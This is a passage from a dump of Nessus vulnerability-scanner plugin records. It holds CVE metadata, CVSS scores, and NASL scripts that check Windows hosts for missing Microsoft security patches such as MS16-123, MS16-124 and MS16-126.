\"Deferred\")\n if (hotfix_check_fversion(file:\"Lync.exe\", version:\"16.0.6965.2092\", channel:\"Deferred\", channel_product:\"Lync\", path:lync_install[\"path\"], bulletin:bulletin, kb:\"3118327\", product:\"Skype for Business 2016\") == HCF_OLDER)\n vuln++;\n\n # Office 365 First Release for Deferred channel\n if (lync_install['Channel'] == \"First Release for Deferred\")\n if (hotfix_check_fversion(file:\"Lync.exe\", version:\"16.0.6741.2081\", channel:\"First Release for Deferred\", channel_product:\"Lync\", path:lync_install[\"path\"], bulletin:bulletin, kb:\"3118327\", product:\"Skype for Business 2016\") == HCF_OLDER)\n vuln++;\n\n # Office 365 Current channel\n if (lync_install['Channel'] == \"Current\")\n if (hotfix_check_fversion(file:\"Lync.exe\", version:\"16.0.7369.2038\", channel:\"Current\", channel_product:\"Lync\", path:lync_install[\"path\"], bulletin:bulletin, kb:\"3118327\", product:\"Skype for Business 2016\") == HCF_OLDER)\n vuln++;\n\n # KB\n if (lync_install['Channel'] == \"MSI\" || empty_or_null(lync_install['Channel']))\n if (hotfix_check_fversion(file:\"Lync.exe\", version:\"16.0.4444.1000\", channel:\"MSI\", channel_product:\"Lync\", path:lync_install[\"path\"], bulletin:bulletin, kb:\"3118327\", product:\"Skype for Business 2016\") == HCF_OLDER)\n vuln++;\n }\n }\n}\n\n\n# \"3188726\", # .NET 3.0 SP2 Security Only\n# \"3189039\", # .NET 4.5.2 Security Only\n# \"3189040\", # .NET 4.6 Security Only\n# \"3188730\", # .NET 3.5.1 Security Only\n# \"3188732\", # .NET 3.5 on Windows 8.1 / 2012 R2 Security Only\n# \"3188731\", # .NET 3.5 on Windows 2012 Security Only\n# \"3188735\", # .NET 3.0 SP2 Monthly Rollup\n# \"3189051\", # .NET 4.5.2 Monthly Rollup\n# \"3189052\", # .NET 4.6 Monthly Rollup\n# \"3188740\", # .NET 3.5.1 Monthly Rollup\n# \"3188743\", # .NET 3.5 on Windows 8.1 / 2012 R2 Monthly Rollup\n# \"3188741\", # .NET 3.5 on Windwos 2012 Monthly Rollup\nfunction dotnet_is_vuln()\n{\n local_var dotnet_452_installed, dotnet_46_installed, dotnet_461_installed, dotnet_35_installed;\n local_var ver, missing, count, installs, install;\n\n\n # Determine if .NET 4.5.2 or 4.6 is installed\n dotnet_452_installed = FALSE;\n dotnet_46_installed = FALSE;\n dotnet_35_installed = FALSE;\n\n count = get_install_count(app_name:'Microsoft .NET Framework');\n if (count > 0)\n {\n installs = get_installs(app_name:'Microsoft .NET Framework');\n foreach install(installs[1])\n {\n ver = install[\"version\"];\n if (ver == \"4.6\") dotnet_46_installed = TRUE;\n if (ver == \"4.5.2\") dotnet_452_installed = TRUE;\n if (ver == \"3.5\") dotnet_35_installed = TRUE;\n }\n }\n\n # \"3188726\", # .NET 3.0 SP2 Security Only\n # \"3188735\", # .NET 3.0 SP2 Monthly Rollup\n # Only on Vista / 2008\n missing = 0;\n missing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wpfgfx_v0300.dll\", version:\"3.0.6920.8720\", min_version:\"3.0.6920.0\", dir:\"\\Microsoft.NET\\Framework\\v3.0\\WPF\");\n if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"3188726\");\n vuln += missing;\n\n if (dotnet_35_installed)\n {\n # \"3188730\", # .NET 3.5.1 Security Only\n # \"3188740\", # .NET 3.5.1 Monthly Rollup\n # Only on 7 / 2008 R2\n missing = 0;\n missing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"wpfgfx_v0300.dll\", version:\"3.0.6920.8720\", dir:\"\\Microsoft.NET\\Framework\\v3.0\\WPF\");\n if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"3188730\");\n vuln += missing;\n\n # \"3188731\", # .NET 3.5 on Windows 2012 Security Only\n # \"3188741\", # .NET 3.5 on Windwos 2012 Monthly Rollup\n # Only on 2012\n missing = 0;\n missing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"wpfgfx_v0300.dll\", version:\"3.0.6920.8720\", dir:\"\\Microsoft.NET\\Framework\\v3.0\\WPF\");\n if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"3188731\");\n vuln += missing;\n\n # \"3188732\", # .NET 3.5 on Windows 8.1 / 2012 R2 Security Only\n # \"3188743\", # .NET 3.5 on Windows 8.1 / 2012 R2 Monthly Rollup\n # Only on 8.1 / 2012 R2\n missing = 0;\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"wpfgfx_v0300.dll\", version:\"3.0.6920.8720\", dir:\"\\Microsoft.NET\\Framework\\v3.0\\WPF\");\n if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"3188732\");\n vuln += missing;\n }\n\n\n if (dotnet_452_installed)\n {\n # \"3189039\", # .NET 4.5.2 Security Only\n # \"3189051\", # .NET 4.5.2 Monthly Rollup\n # Only on Vista / 2008\n missing = 0;\n missing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wpfgfx_v0400.dll\", version:\"4.0.30319.36367\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"3189039\");\n vuln += missing;\n }\n\n if (dotnet_46_installed)\n {\n # \"3189040\", # .NET 4.6 Security Only\n # \"3189052\", # .NET 4.6 Monthly Rollup\n # Only on Vista / 2008\n missing = 0;\n missing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wpfgfx_v0400.dll\", version:\"4.6.1085.0\", min_version:\"4.6.0.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"3189040\");\n vuln += missing;\n }\n\n}\n\n# \"3193713\" # Silverlight 5\nfunction silverlight_is_vuln()\n{\n local_var silver, path, report, fix;\n silver = get_kb_item(\"SMB/Silverlight/Version\");\n if (!isnull(silver) && silver =~ \"^5\\.\")\n {\n fix = \"5.1.50901.0\";\n if (ver_compare(ver:silver, fix:fix) == -1)\n {\n path = get_kb_item(\"SMB/Silverlight/Path\");\n if (isnull(path)) path = 'n/a';\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + silver +\n '\\n Fixed version : ' + fix +\n '\\n';\n hotfix_add_report(report, bulletin:bulletin, kb:\"3193713\");\n vuln++;\n }\n }\n}\n\ndotnet_is_vuln();\noffice_is_vuln();\nlync_is_vuln();\nsilverlight_is_vuln();\nwindows_os_is_vuln();\n\nif (vuln > 0)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:43:53", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to execute\n arbitrary code in kernel mode. (CVE-2016-3266,\n CVE-2016-3376, CVE-2016-7185, CVE-2016-7191)\n\n - An elevation of privilege vulnerability exists in\n Windows Transaction Manager due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n processes in an elevated context. (CVE-2016-3341)", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-10-12T00:00:00", "title": "MS16-123: Security Update for Windows Kernel-Mode Drivers (3192892)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7191", "CVE-2016-3341", "CVE-2016-3376", "CVE-2016-3266", "CVE-2016-7211", "CVE-2016-7185"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS16-123.NASL", "href": "https://www.tenable.com/plugins/nessus/94012", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94012);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/05/30 11:03:54\");\n\n script_cve_id(\n \"CVE-2016-3266\",\n \"CVE-2016-3341\",\n \"CVE-2016-3376\",\n \"CVE-2016-7185\",\n \"CVE-2016-7211\"\n );\n script_bugtraq_id(\n 93384,\n 93388,\n 93389,\n 93391,\n 93556\n );\n script_xref(name:\"MSFT\", value:\"MS16-123\");\n script_xref(name:\"MSKB\", value:\"3191203\");\n script_xref(name:\"MSKB\", value:\"3183431\");\n script_xref(name:\"MSKB\", value:\"3192391\");\n script_xref(name:\"MSKB\", value:\"3185330\");\n script_xref(name:\"MSKB\", value:\"3192392\");\n script_xref(name:\"MSKB\", value:\"3185331\");\n script_xref(name:\"MSKB\", value:\"3192393\");\n script_xref(name:\"MSKB\", value:\"3185332\");\n script_xref(name:\"MSKB\", value:\"3192440\");\n script_xref(name:\"MSKB\", value:\"3192441\");\n script_xref(name:\"MSKB\", value:\"3194798\");\n script_xref(name:\"MSKB\", value:\"4038788\");\n script_xref(name:\"IAVA\", value:\"2016-A-0279\");\n\n script_name(english:\"MS16-123: Security Update for Windows Kernel-Mode Drivers (3192892)\");\n script_summary(english:\"Checks the version of ntoskrnl.exe.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to execute\n arbitrary code in kernel mode. (CVE-2016-3266,\n CVE-2016-3376, CVE-2016-7185, CVE-2016-7191)\n\n - An elevation of privilege vulnerability exists in\n Windows Transaction Manager due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n processes in an elevated context. (CVE-2016-3341)\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-123\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e7e63f93\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, and 10.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3266\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-123';\nkbs = make_list(\n '3191203',\n '3183431',\n '3192391',\n '3185330',\n '3192392',\n '3185331',\n '3192393',\n '3185332',\n '3192440',\n '3192441',\n '3194798',\n '4038788'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Vista / 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24017\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3191203\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19693\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3191203\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mrxdav.sys\", version:\"6.0.6002.24016\", min_version:\"6.0.6002.23000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3183431\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mrxdav.sys\", version:\"6.0.6002.19691\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3183431\") ||\n # 8.1 / 2012 R2\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3192392, 3185331)) ||\n # 2012\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3192393, 3185332)) ||\n # 7 / 2008 R2\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3185330, 3192391)) ||\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3192440)) ||\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3192441)) ||\n # 10 (1607)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3194798)) ||\n\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4038788))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:43:53", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple information disclosure vulnerabilities\nin the kernel API that allow a local attacker, via a specially crafted\napplication, to disclose sensitive registry information.", "edition": 34, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"}, "published": "2016-10-12T00:00:00", "title": "MS16-124: Security Update for Windows Registry (3193227)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0075", "CVE-2016-0079", "CVE-2016-0070", "CVE-2016-0073"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS16-124.NASL", "href": "https://www.tenable.com/plugins/nessus/94013", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94013);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\n \"CVE-2016-0070\",\n \"CVE-2016-0073\",\n \"CVE-2016-0075\",\n \"CVE-2016-0079\"\n );\n script_bugtraq_id(\n 93354,\n 93355,\n 93356,\n 93357\n );\n script_xref(name:\"MSFT\", value:\"MS16-124\");\n script_xref(name:\"MSKB\", value:\"3185330\");\n script_xref(name:\"MSKB\", value:\"3185331\");\n script_xref(name:\"MSKB\", value:\"3185332\");\n script_xref(name:\"MSKB\", value:\"3191256\");\n script_xref(name:\"MSKB\", value:\"3192391\");\n script_xref(name:\"MSKB\", value:\"3192392\");\n script_xref(name:\"MSKB\", value:\"3192393\");\n script_xref(name:\"MSKB\", value:\"3192440\");\n script_xref(name:\"MSKB\", value:\"3192441\");\n script_xref(name:\"MSKB\", value:\"3194798\");\n script_xref(name:\"IAVA\", value:\"2016-A-0282\");\n\n script_name(english:\"MS16-124: Security Update for Windows Registry (3193227)\");\n script_summary(english:\"Checks the version of ntoskrnl.exe.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple information disclosure\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple information disclosure vulnerabilities\nin the kernel API that allow a local attacker, via a specially crafted\napplication, to disclose sensitive registry information.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-124\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, and 10.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0070\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-124';\nkbs = make_list(\n '3185330',\n '3185331',\n '3185332',\n '3191256',\n '3192391',\n '3192392',\n '3192393',\n '3192440',\n '3192441',\n '3194798'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\"))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows Vista / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntoskrnl.exe\", version:\"6.0.6002.24020\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3191256\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntoskrnl.exe\", version:\"6.0.6002.19697\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3191256\") ||\n # Windows 7 / Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3185330, 3192391)) ||\n # Windows Server 2012\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3185332, 3192393)) ||\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3185331, 3192392)) ||\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3192440)) ||\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3192441)) ||\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3194798))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T05:43:53", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by an information disclosure vulnerability in the\nInternet Messaging API due to improper handling of objects in memory.\nAn unauthenticated, remote attacker can exploit this, by convincing a\nuser to visit a specially crafted website, to enumerate the files on\nthe disk drive.", "edition": 33, "cvss3": {"score": 5.3, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"}, "published": "2016-10-12T00:00:00", "title": "MS16-126: Security Update for Microsoft Internet Messaging API (3196067)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3298"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS16-126.NASL", "href": "https://www.tenable.com/plugins/nessus/94009", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94009);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2016-3298\");\n script_bugtraq_id(93392);\n script_xref(name:\"MSFT\", value:\"MS16-126\");\n script_xref(name:\"MSKB\", value:\"3196067\");\n script_xref(name:\"MSKB\", value:\"3193515\");\n script_xref(name:\"MSKB\", value:\"3192391\");\n script_xref(name:\"MSKB\", value:\"3185330\");\n script_xref(name:\"IAVB\", value:\"2016-B-0150\");\n\n script_name(english:\"MS16-126: Security Update for Microsoft Internet Messaging API (3196067)\");\n script_summary(english:\"Checks the version of Inetcomm.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by an information disclosure vulnerability in the\nInternet Messaging API due to improper handling of objects in memory.\nAn unauthenticated, remote attacker can exploit this, by convincing a\nuser to visit a specially crafted website, to enumerate the files on\nthe disk drive.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-126\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\nand 2008 R2. Note that MS16-118 must also be installed to fully\nresolve CVE-2016-3298.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3298\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-126';\nkbs = make_list(\n '3196067',\n '3193515',\n '3192391',\n '3185330'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_NOTE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Check rollup first\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif(\n # 7 / 2008 R2\n smb_check_rollup(os:\"6.1\",sp:1,rollup_date: \"10_2016\",bulletin:bulletin,rollup_kb_list:make_list(\"3192391\",\"3185330\")) ||\n # Vista / 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Inetcomm.dll\", version:\"6.0.6002.24018\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3193515\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"inetcomm.dll\", version:\"6.0.6002.19694\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3193515\") \n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_note();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T05:43:53", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by a remote code execution vulnerability in\nMicrosoft Video Control due to improper handling of objects in memory.\nAn unauthenticated, remote attacker can exploit this vulnerability\nby convincing a user to visit a specially crafted website or open a\nspecially crafted file, resulting in the execution of arbitrary code\nin the context of the current user.", "edition": 31, "cvss3": {"score": 7.8, "vector": 